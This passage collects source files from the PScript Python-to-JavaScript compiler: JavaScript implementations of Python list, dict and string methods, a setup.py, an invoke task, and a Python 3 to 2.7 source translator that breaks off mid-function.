FUNCTIONS['op_mult'] = """function (a, b) { // nargs: 2
if ((typeof a === 'number') + (typeof b === 'number') === 1) {
if (a.constructor === String) return METHOD_PREFIXrepeat(a, b);
if (b.constructor === String) return METHOD_PREFIXrepeat(b, a);
if (Array.isArray(b)) {var t=a; a=b; b=t;}
if (Array.isArray(a)) {
var res = []; for (var i=0; i<b; i++) res = res.concat(a);
return res;
}
} return a * b;
}"""
## ----- Methods
## List only
METHODS['append'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
this.push(x);
}"""
METHODS['extend'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
this.push.apply(this, x);
}"""
METHODS['insert'] = """function (i, x) { // nargs: 2
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
i = (i < 0) ? this.length + i : i;
this.splice(i, 0, x);
}"""
METHODS['remove'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
for (var i=0; i<this.length; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {this.splice(i, 1); return;}
}
var e = Error(x); e.name='ValueError'; throw e;
}"""
METHODS['reverse'] = """function () { // nargs: 0
this.reverse();
}"""
METHODS['sort'] = """function (key, reverse) { // nargs: 0 1 2
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
var comp = function (a, b) {a = key(a); b = key(b);
if (a<b) {return -1;} if (a>b) {return 1;} return 0;};
comp = Boolean(key) ? comp : undefined;
this.sort(comp);
if (reverse) this.reverse();
}"""
## List and dict
METHODS['clear'] = """function () { // nargs: 0
if (Array.isArray(this)) {
this.splice(0, this.length);
} else if (this.constructor === Object) {
var keys = Object.keys(this);
for (var i=0; i<keys.length; i++) delete this[keys[i]];
} else return this.KEY.apply(this, arguments);
}"""
METHODS['copy'] = """function () { // nargs: 0
if (Array.isArray(this)) {
return this.slice(0);
} else if (this.constructor === Object) {
var key, keys = Object.keys(this), res = {};
for (var i=0; i<keys.length; i++) {key = keys[i]; res[key] = this[key];}
return res;
} else return this.KEY.apply(this, arguments);
}"""
METHODS['pop'] = """function (i, d) { // nargs: 1 2
if (Array.isArray(this)) {
i = (i === undefined) ? -1 : i;
i = (i < 0) ? (this.length + i) : i;
var popped = this.splice(i, 1);
if (popped.length) return popped[0];
var e = Error(i); e.name='IndexError'; throw e;
} else if (this.constructor === Object) {
var res = this[i]
if (res !== undefined) {delete this[i]; return res;}
else if (d !== undefined) return d;
var e = Error(i); e.name='KeyError'; throw e;
} else return this.KEY.apply(this, arguments);
}"""
## List and str
# start and stop nor supported for list on Python, but for simplicity, we do
METHODS['count'] = """function (x, start, stop) { // nargs: 1 2 3
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
if (Array.isArray(this)) {
var count = 0;
for (var i=0; i<this.length; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {count+=1;}
} return count;
} else if (this.constructor == String) {
var count = 0, i = start;
while (i >= 0 && i < stop) {
i = this.indexOf(x, i);
if (i < 0) break;
count += 1;
i += Math.max(1, x.length);
} return count;
} else return this.KEY.apply(this, arguments);
}"""
METHODS['index'] = """function (x, start, stop) { // nargs: 1 2 3
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
if (Array.isArray(this)) {
for (var i=start; i<stop; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {return i;} // indexOf cant
}
} else if (this.constructor === String) {
var i = this.slice(start, stop).indexOf(x);
if (i >= 0) return i + start;
} else return this.KEY.apply(this, arguments);
var e = Error(x); e.name='ValueError'; throw e;
}"""
## Dict only
# note: fromkeys is a classmethod, and we dont support it.
METHODS['get'] = """function (key, d) { // nargs: 1 2
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
if (this[key] !== undefined) {return this[key];}
else if (d !== undefined) {return d;}
else {return null;}
}"""
METHODS['items'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(this), res = []
for (var i=0; i<keys.length; i++) {key = keys[i]; res.push([key, this[key]]);}
return res;
}"""
METHODS['keys'] = """function () { // nargs: 0
if (typeof this['KEY'] === 'function') return this.KEY.apply(this, arguments);
return Object.keys(this);
}"""
METHODS['popitem'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var keys, key, val;
keys = Object.keys(this);
if (keys.length == 0) {var e = Error(); e.name='KeyError'; throw e;}
key = keys[0]; val = this[key]; delete this[key];
return [key, val];
}"""
METHODS['setdefault'] = """function (key, d) { // nargs: 1 2
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
if (this[key] !== undefined) {return this[key];}
else if (d !== undefined) { this[key] = d; return d;}
else {return null;}
}"""
METHODS['update'] = """function (other) { // nargs: 1
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(other);
for (var i=0; i<keys.length; i++) {key = keys[i]; this[key] = other[key];}
return null;
}"""
METHODS['values'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(this), res = [];
for (var i=0; i<keys.length; i++) {key = keys[i]; res.push(this[key]);}
return res;
}"""
## String only
# ignores: encode, decode, format_map, isprintable, maketrans
# Not a Python method, but a method that we need, and is only ECMA 6
# http://stackoverflow.com/a/5450113/2271927
METHODS['repeat'] = """function(count) { // nargs: 0
if (this.repeat) return this.repeat(count);
if (count < 1) return '';
var result = '', pattern = this.valueOf();
while (count > 1) {
if (count & 1) result += pattern;
count >>= 1, pattern += pattern;
}
return result + pattern;
}"""
METHODS['capitalize'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.slice(0, 1).toUpperCase() + this.slice(1).toLowerCase();
}"""
METHODS['casefold'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toLowerCase();
}"""
METHODS['center'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
var left = Math.ceil(tofill / 2);
var right = tofill - left;
return METHOD_PREFIXrepeat(fill, left) + this + METHOD_PREFIXrepeat(fill, right);
}"""
METHODS['endswith'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var last_index = this.lastIndexOf(x);
return last_index == this.length - x.length && last_index >= 0;
}"""
METHODS['expandtabs'] = """function (tabsize) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
tabsize = (tabsize === undefined) ? 8 : tabsize;
return this.replace(/\\t/g, METHOD_PREFIXrepeat(' ', tabsize));
}"""
METHODS['find'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
var i = this.slice(start, stop).indexOf(x);
if (i >= 0) return i + start;
return -1;
}"""
METHODS['format'] = """function () {
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var parts = [], i = 0, i1, i2;
var itemnr = -1;
while (i < this.length) {
// find opening
i1 = this.indexOf('{', i);
if (i1 < 0 || i1 == this.length-1) { break; }
if (this[i1+1] == '{') {parts.push(this.slice(i, i1+1)); i = i1 + 2; continue;}
// find closing
i2 = this.indexOf('}', i1);
if (i2 < 0) { break; }
// parse
itemnr += 1;
var fmt = this.slice(i1+1, i2);
var index = fmt.split(':')[0].split('!')[0];
index = index? Number(index) : itemnr
var s = FUNCTION_PREFIXformat(arguments[index], fmt);
parts.push(this.slice(i, i1), s);
i = i2 + 1;
}
parts.push(this.slice(i));
return parts.join('');
}"""
METHODS['isalnum'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z0-9]+$/.test(this));
}"""
METHODS['isalpha'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z]+$/.test(this));
}"""
METHODS['isidentifier'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z_][A-Za-z0-9_]*$/.test(this));
}"""
METHODS['islower'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), high = this.toUpperCase();
return low != high && low == this;
}"""
METHODS['isdecimal'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[0-9]+$/.test(this));
}"""
# The thing about isdecimal, isdigit and isnumeric.
# https://stackoverflow.com/a/36800319/2271927
#
# * isdecimal() (Only Decimal Numbers)
# * str.isdigit() (Decimals, Subscripts, Superscripts)
# * isnumeric() (Digits, Vulgar Fractions, Subscripts, Superscripts,
# Roman Numerals, Currency Numerators)
#
# In other words, isdecimal is the most strict. We used to have
# isnumeric with isdecimal's implementation, so we provide isnumeric
# and isdigit as aliases for now.
METHODS['isnumeric'] = METHODS['isdigit'] = METHODS['isdecimal']
METHODS['isspace'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^\\s+$/.test(this));
}"""
METHODS['istitle'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), title = METHOD_PREFIXtitle(this);
return low != title && title == this;
}"""
METHODS['isupper'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), high = this.toUpperCase();
return low != high && high == this;
}"""
METHODS['join'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return x.join(this); // call join on the list instead of the string.
}"""
METHODS['ljust'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
return this + METHOD_PREFIXrepeat(fill, tofill);
}"""
METHODS['lower'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toLowerCase();
}"""
METHODS['lstrip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
for (var i=0; i<this.length; i++) {
if (chars.indexOf(this[i]) < 0) return this.slice(i);
} return '';
}"""
METHODS['partition'] = """function (sep) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
var i1 = this.indexOf(sep);
if (i1 < 0) return [this.slice(0), '', '']
var i2 = i1 + sep.length;
return [this.slice(0, i1), this.slice(i1, i2), this.slice(i2)];
}"""
METHODS['replace'] = """function (s1, s2, count) { // nargs: 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i = 0, i2, parts = [];
count = (count === undefined) ? 1e20 : count;
while (count > 0) {
i2 = this.indexOf(s1, i);
if (i2 >= 0) {
parts.push(this.slice(i, i2));
parts.push(s2);
i = i2 + s1.length;
count -= 1;
} else break;
}
parts.push(this.slice(i));
return parts.join('');
}"""
METHODS['rfind'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
var i = this.slice(start, stop).lastIndexOf(x);
if (i >= 0) return i + start;
return -1;
}"""
METHODS['rindex'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i = METHOD_PREFIXrfind(this, x, start, stop);
if (i >= 0) return i;
var e = Error(x); e.name='ValueError'; throw e;
}"""
METHODS['rjust'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
return METHOD_PREFIXrepeat(fill, tofill) + this;
}"""
METHODS['rpartition'] = """function (sep) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
var i1 = this.lastIndexOf(sep);
if (i1 < 0) return ['', '', this.slice(0)]
var i2 = i1 + sep.length;
return [this.slice(0, i1), this.slice(i1, i2), this.slice(i2)];
}"""
METHODS['rsplit'] = """function (sep, count) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
sep = (sep === undefined) ? /\\s/ : sep;
count = Math.max(0, (count === undefined) ? 1e20 : count);
var parts = this.split(sep);
var limit = Math.max(0, parts.length-count);
var res = parts.slice(limit);
if (count < parts.length) res.splice(0, 0, parts.slice(0, limit).join(sep));
return res;
}"""
METHODS['rstrip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
for (var i=this.length-1; i>=0; i--) {
if (chars.indexOf(this[i]) < 0) return this.slice(0, i+1);
} return '';
}"""
METHODS['split'] = """function (sep, count) { // nargs: 0, 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
sep = (sep === undefined) ? /\\s/ : sep;
if (count === undefined) { return this.split(sep); }
var res = [], i = 0, index1 = 0, index2 = 0;
while (i < count && index1 < this.length) {
index2 = this.indexOf(sep, index1);
if (index2 < 0) { break; }
res.push(this.slice(index1, index2));
index1 = index2 + sep.length || 1;
i += 1;
}
res.push(this.slice(index1));
return res;
}"""
METHODS['splitlines'] = """function (keepends) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
keepends = keepends ? 1 : 0
var finder = /\\r\\n|\\r|\\n/g;
var i = 0, i2, isrn, parts = [];
while (finder.exec(this) !== null) {
i2 = finder.lastIndex -1;
isrn = i2 > 0 && this[i2-1] == '\\r' && this[i2] == '\\n';
if (keepends) parts.push(this.slice(i, finder.lastIndex));
else parts.push(this.slice(i, i2 - isrn));
i = finder.lastIndex;
}
if (i < this.length) parts.push(this.slice(i));
else if (!parts.length) parts.push('');
return parts;
}"""
METHODS['startswith'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.indexOf(x) == 0;
}"""
METHODS['strip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
var i, s1 = this, s2 = '', s3 = '';
for (i=0; i<s1.length; i++) {
if (chars.indexOf(s1[i]) < 0) {s2 = s1.slice(i); break;}
} for (i=s2.length-1; i>=0; i--) {
if (chars.indexOf(s2[i]) < 0) {s3 = s2.slice(0, i+1); break;}
} return s3;
}"""
METHODS['swapcase'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var c, res = [];
for (var i=0; i<this.length; i++) {
c = this[i];
if (c.toUpperCase() == c) res.push(c.toLowerCase());
else res.push(c.toUpperCase());
} return res.join('');
}"""
METHODS['title'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i0, res = [], tester = /^[^A-Za-z]?[A-Za-z]$/;
for (var i=0; i<this.length; i++) {
i0 = Math.max(0, i-1);
if (tester.test(this.slice(i0, i+1))) res.push(this[i].toUpperCase());
else res.push(this[i].toLowerCase());
} return res.join('');
}"""
METHODS['translate'] = """function (table) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var c, res = [];
for (var i=0; i<this.length; i++) {
c = table[this[i]];
if (c === undefined) res.push(this[i]);
else if (c !== null) res.push(c);
} return res.join('');
}"""
METHODS['upper'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toUpperCase();
}"""
METHODS['zfill'] = """function (width) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return METHOD_PREFIXrjust(this, width, '0');
}"""
for key in METHODS:
METHODS[key] = re.subn(r'METHOD_PREFIX(.+?)\(',
r'METHOD_PREFIX\1.call(', METHODS[key])[0]
METHODS[key] = METHODS[key].replace(
'KEY', key).replace(
'FUNCTION_PREFIX', FUNCTION_PREFIX).replace(
'METHOD_PREFIX', METHOD_PREFIX).replace(
', )', ')')
for key in FUNCTIONS:
FUNCTIONS[key] = re.subn(r'METHOD_PREFIX(.+?)\(',
r'METHOD_PREFIX\1.call(', FUNCTIONS[key])[0]
FUNCTIONS[key] = FUNCTIONS[key].replace(
'KEY', key).replace(
'FUNCTION_PREFIX', FUNCTION_PREFIX).replace(
'METHOD_PREFIX', METHOD_PREFIX)
```
#### File: JesusZerpa/pscript/setup.py
```python
import os
import shutil
try:
import setuptools # noqa, analysis:ignore
except ImportError:
pass # setuptools allows for "develop", but it's not essential
from distutils.core import setup
## Function we need
def get_version_and_doc(filename):
NS = dict(__version__='', __doc__='')
docStatus = 0 # Not started, in progress, done
for line in open(filename, 'rb').read().decode().splitlines():
if line.startswith('__version__'):
exec(line.strip(), NS, NS)
elif line.startswith('"""'):
if docStatus == 0:
docStatus = 1
line = line.lstrip('"')
elif docStatus == 1:
docStatus = 2
if docStatus == 1:
NS['__doc__'] += line.rstrip() + '\n'
if not NS['__version__']:
raise RuntimeError('Could not find __version__')
return NS['__version__'], NS['__doc__']
def package_tree(pkgroot):
subdirs = [os.path.relpath(i[0], THIS_DIR).replace(os.path.sep, '.')
for i in os.walk(os.path.join(THIS_DIR, pkgroot))
if '__init__.py' in i[2]]
return subdirs
def copy_for_legacy_python(src_dir, dest_dir):
from translate_to_legacy import LegacyPythonTranslator
# Dirs and files to explicitly not translate
skip = ['tests/python_sample.py',
'tests/python_sample2.py',
'tests/python_sample3.py']
# Make a fresh copy of the package
if os.path.isdir(dest_dir):
shutil.rmtree(dest_dir)
ignore = lambda src, names: [n for n in names if n == '__pycache__']
shutil.copytree(src_dir, dest_dir, ignore=ignore)
# Translate in-place
LegacyPythonTranslator.translate_dir(dest_dir, skip=skip)
## Collect info for setup()
THIS_DIR = os.path.dirname(__file__)
# Define name and description
name = 'pscript'
description = "Python to JavaScript compiler."
# Get version and docstring (i.e. long description)
version, doc = get_version_and_doc(os.path.join(THIS_DIR, name, '__init__.py'))
doc = "" # won't render open(os.path.join(THIS_DIR, 'README.md'), "rb").read().decode()
# Support for legacy Python: we install a second package with the
# translated code. We generate that code when we can. We use
# "name_legacy" below in "packages", "package_dir", and "package_data".
name_legacy = name + '_legacy'
if os.path.isfile(os.path.join(THIS_DIR, 'translate_to_legacy.py')):
copy_for_legacy_python(os.path.join(THIS_DIR, name),
os.path.join(THIS_DIR, name_legacy))
## Setup
setup(
name=name,
version=version,
author='<NAME> and contributors',
author_email='<EMAIL>',
license='(new) BSD',
url='http://pscript.readthedocs.io',
download_url='https://pypi.python.org/pypi/pscript',
keywords="Python, JavaScript, compiler, transpiler",
description=description,
long_description=doc,
long_description_content_type="text/markdown",
platforms='any',
provides=[name],
install_requires=[],
packages=package_tree(name) + package_tree(name_legacy),
package_dir={name: name, name_legacy: name_legacy},
# entry_points={'console_scripts': ['pscript = pscript.__main__:main'], },
zip_safe=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
)
```
#### File: pscript/tasks/pscript.py
```python
from invoke import task
# todo: also print meta info like globals etc.
@task(help=dict(code='the Python code to transpile'))
def py2js(ctx, code):
"""transpile given Python code to JavaScript
"""
from pscript import py2js
print(py2js(code))
```
#### File: JesusZerpa/pscript/translate_to_legacy.py
```python
from __future__ import print_function
import os
import re
# List of fixers from lib3to2: absimport annotations bitlength bool
# bytes classdecorator collections dctsetcomp division except features
# fullargspec funcattrs getcwd imports imports2 input int intern
# itertools kwargs memoryview metaclass methodattrs newstyle next
# numliterals open print printfunction raise range reduce setliteral
# str super throw unittest unpacking with
ALPHANUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
KEYWORDS = set(['False', 'None', 'True', 'and', 'as', 'assert', 'break',
'class', 'continue', 'def', 'del', 'elif', 'else', 'except',
'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is',
'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return',
'try', 'while', 'with', 'yield'])
# This regexp is used to find the tokens
tokenProg = re.compile(
'(#)|' + # Comment or
'(' + # Begin of string group (group 1)
'[bB]?[uU]?[rR]?' + # Possibly bytes, unicode, raw
'("""|\'\'\'|"|\')' + # String start (triple qoutes first, group 3)
')|' + # End of string group
'([' + ALPHANUM + '_]+)' # Identifiers/numbers (group 1) or
)
# regexps to find the end of a comment or string
endProgs = {
"#": re.compile(r"\r?\n"),
"'": re.compile(r"([^\\])(\\\\)*'"),
'"': re.compile(r'([^\\])(\\\\)*"'),
"'''": re.compile(r"([^\\])(\\\\)*'''"),
'"""': re.compile(r'([^\\])(\\\\)*"""'),
}
class CancelTranslation(RuntimeError):
pass # to cancel a translation
class Token:
""" A token in the source code. The type of token can be a comment,
string, keyword, number or identifier. It has functionality to get
information on neighboring tokens and neighboring characters. This
should be enough to do all necessary translations.
If the ``fix`` attribute is set, that string will replace the
current string.
"""
def __init__(self, total_text, type, start, end):
self.total_text = total_text
self.type = type
self.start = start
self.end = end
self.fix = None
def __repr__(self):
return '<token %r>' % self.text
def find_forward(self, s):
""" Find the position of a character to the right.
"""
return self.total_text.find(s, self.end)
def find_backward(self, s):
""" Find the position of a character to the left.
"""
return self.total_text.rfind(s, 0, self.start)
@property
def text(self):
""" The original text of the token.
"""
return self.total_text[self.start:self.end]
@property
def prev_char(self):
""" The first non-whitespace char to the left of this token
that is still on the same line.
"""
i = self.find_backward('\n')
i = i if i >= 0 else 0
line = self.total_text[i:self.start]
line = re.sub(r"\s+", '', line) # remove whitespace
return line[-1:] # return single char or empty string
@property
def next_char(self):
""" Get the first non-whitespace char to the right of this token
that is still on the same line.
"""
i = self.find_forward('\n')
i = i if i >= 0 else len(self.total_text)
line = self.total_text[self.end:i]
line = re.sub(r"\s+", '', line) # remove whitespace
return line[:1] # return single char or empty string
@property
def indentation(self):
""" The number of chars that the current line uses for indentation.
"""
i = max(0, self.find_backward('\n'))
line1 = self.total_text[i+1:self.start]
line2 = line1.lstrip()
return len(line1) - len(line2)
@property
def line_tokens(self):
""" All (non-comment) tokens that are on the same line.
"""
i1, i2 = self.find_backward('\n'), self.find_forward('\n')
i1 = i1 if i1 >= 0 else 0
i2 = i2 if i2 >= 0 else len(self.total_text)
t = self
tokens = []
while t.prev_token and t.prev_token.start >= i1:
t = t.prev_token
tokens.append(t)
while (t.next_token and t.next_token.end <= i2 and
t.next_token.type != 'comment'):
t = t.next_token
tokens.append(t)
return tokens
class BaseTranslator:
""" Translate Python code. One translator instance is used to
translate one file.
"""
def __init__(self, text):
self._text = text
self._tokens = None
@property
def tokens(self):
""" The list of tokens.
"""
if self._tokens is None:
self._parse()
return self._tokens
def _parse(self):
""" Generate tokens by parsing the code.
"""
self._tokens = []
pos = 0
# Find tokens
while True:
token = self._find_next_token(pos)
if token is None:
break
self._tokens.append(token)
pos = token.end
# Link tokens
if self._tokens:
self._tokens[0].prev_token = None
self._tokens[len(self._tokens)-1].next_token = None
for i in range(0, len(self._tokens)-1):
self._tokens[i].next_token = self._tokens[i+1]
for i in range(1, len(self._tokens)):
self._tokens[i].prev_token = self._tokens[i-1]
def _find_next_token(self, pos):
""" Returns a token or None if no new tokens can be found.
"""
text = self._text
# Init tokens, if pos too large, were done
if pos > len(text):
return None
# Find the start of the next string or comment
match = tokenProg.search(text, pos)
if not match:
return None
if match.group(1):
# Comment
start = match.start()
end_match = endProgs['#'].search(text, start+1)
end = end_match.start() if end_match else len(text)
return Token(text, 'comment', start, end)
elif match.group(2) is not None:
# String - we start the search for the end-char(s) at end-1,
# because our regexp has to allow for one char (which is
# not backslash) before the end char(s).
start = match.start()
string_style = match.group(3)
end = endProgs[string_style].search(text, match.end() - 1).end()
return Token(text, 'string', start, end)
else:
# Identifier ("a word or number") Find out whether it is a key word
identifier = match.group(4)
tokenArgs = match.start(), match.end()
if identifier in KEYWORDS:
return Token(text, 'keyword', *tokenArgs)
elif identifier[0] in '0123456789':
return Token(text, 'number', *tokenArgs)
else:
return Token(text, 'identifier', *tokenArgs)
def translate(self):
""" Translate the code by applying fixes to the tokens. Returns
the new code as a string.
"""
# Collect fixers. Sort by name, so at least its consistent.
fixers = []
for name in sorted(dir(self)):
if name.startswith('fix_'):
fixers.append(getattr(self, name))
# Apply fixers
new_tokens = []
for i, token in enumerate(self.tokens):
for fixer in fixers:
new_token = fixer(token)
if isinstance(new_token, Token):
assert new_token.start == new_token.end
if new_token.start <= token.start:
new_tokens.append((i, new_token))
else:
new_tokens.append((i+1, new_token))
# Insert new tokens
for i, new_token in reversed(new_tokens):
self._tokens.insert(i, new_token)
return self.dumps()
def dumps(self):
""" Return a string with the translated code.
"""
text = self._text
pos = len(self._text)
pieces = []
for t in reversed(self.tokens):
pieces.append(text[t.end:pos])
pieces.append(t.fix if t.fix is not None else t.text)
pos = t.start
pieces.append(text[:pos])
return ''.join(reversed(pieces))
@classmethod
def translate_dir(cls, dirname, skip=()):
""" Classmethod to translate all .py files in the given
directory and its subdirectories. Skips files that match names
in skip (which can be full file names, absolute paths, and paths
relative to dirname). Any file that imports 'print_function'
from __future__ is cancelled.
"""
dirname = os.path.normpath(dirname)
skip = [os.path.normpath(p) for p in skip]
for root, dirs, files in os.walk(dirname):
for fname in files:
if fname.endswith('.py'):
filename = os.path.join(root, fname)
relpath = os.path.relpath(filename, dirname)
if fname in skip or relpath in skip or filename in skip:
print('%s skipped: %r' % (cls.__name__, relpath))
continue
code = open(filename, 'rb').read().decode('utf-8')
try:
new_code = cls(code).translate()
except CancelTranslation:
print('%s cancelled: %r' % (cls.__name__, relpath))
else:
with open(filename, 'wb') as f:
f.write(new_code.encode('utf-8'))
print('%s translated: %r' % (cls.__name__, relpath))
class LegacyPythonTranslator(BaseTranslator):
""" A Translator to translate Python 3 to Python 2.7.
"""
FUTURES = ('print_function', 'absolute_import', 'with_statement',
'unicode_literals', 'division')
def dumps(self):
return '# -*- coding: utf-8 -*-\n' + BaseTranslator.dumps(self)
def fix_cancel(self, token):
""" Cancel translation if using `from __future__ import xxx`
"""
if token.type == 'keyword' and (token.text == 'from' and
token.next_token.text == '__future__'):
for future in self.FUTURES:
if any([t.text == future for t in token.line_tokens]):
# Assume this module is already Python 2.7 compatible
raise CancelTranslation()
def fix_future(self, token):
""" Fix print_function, absolute_import, with_statement.
"""
status = getattr(self, '_future_status', 0)
if status == 2:
return # Done
if status == 0 and token.type == 'string':
self._future_status = 1 # docstring
elif token.type != 'comment':
self._future_status = 2 # done
i = max(0, token.find_backward('\n'))
t = Token(token.total_text, '', i, i)
t.fix = '\nfrom __future__ import %s\n' % (', '.join(self.FUTURES))
return t
def fix_newstyle(self, token):
""" Fix to always use new style classes.
"""
if token.type == 'keyword' and token.text == 'class':
nametoken = token.next_token
if nametoken.next_char != '(':
nametoken.fix = '%s(object)' % nametoken.text
def fix_super(self, token):
""" Fix super() -> super(Cls, self)
"""
# First keep track of the current class
if token.type == 'keyword':
if token.text == 'class':
self._current_class = token.indentation, token.next_token.text
elif token.text == 'def':
indent, name = getattr(self, '_current_class', (0, ''))
if token.indentation <= indent:
self._current_class = 0, ''
# Then check for super
if token.type == 'identifier' and token.text == 'super':
if token.prev_char != '.' and token.next_char == '(':
i = token.find_forward(')')
sub = token.total_text[token.end:i+1]
if re.sub(r"\s+", '', sub) == '()':
indent, name = getattr(self, '_current_class', (0, ''))
if name:
token.end = i + 1
token.fix = 'super(%s, self)' % name
# Note: we use "from __future__ import unicode_literals"
# def fix_unicode_literals(self, token):
# if token.type == 'string':
# if token.text.lstrip('r').startswith(('"', "'")): # i.e. no b/u
# token.fix = 'u' + token.text
def fix_unicode(self, token):
if token.type == 'identifier':
if token.text == 'chr' and token.next_char == '(':
# Calling chr
token.fix = 'unichr'
elif token.text == 'str' and token.next_char == '(':
# Calling str
token.fix = 'unicode'
elif token.text == 'str' and (token.next_char == ')' and
token.prev_char == '(' and
token.line_tokens[0].text == 'class'):
token.fix = 'unicode'
elif token.text == 'isinstance' and token.next_char == '(':
# Check for usage of str in isinstance
end = token.find_forward(')')
t = token.next_token
while t.next_token and t.next_token.start < end:
t = t.next_token
if t.text == 'str':
t.fix = 'basestring'
def fix_range(self, token):
if token.type == 'identifier' and token.text == 'range':
if token.next_char == '(' and token.prev_char != '.':
token.fix = 'xrange'
def fix_encode(self, token):
if token.type == 'identifier' and token.text in('encode', 'decode'):
if token.next_char == '(' and token.prev_char == '.':
end = token.find_forward(')')
if not (token.next_token and token.next_token.start < end):
token.fix = token.text + '("utf-8")'
token.end = end + 1
def fix_getcwd(self, token):
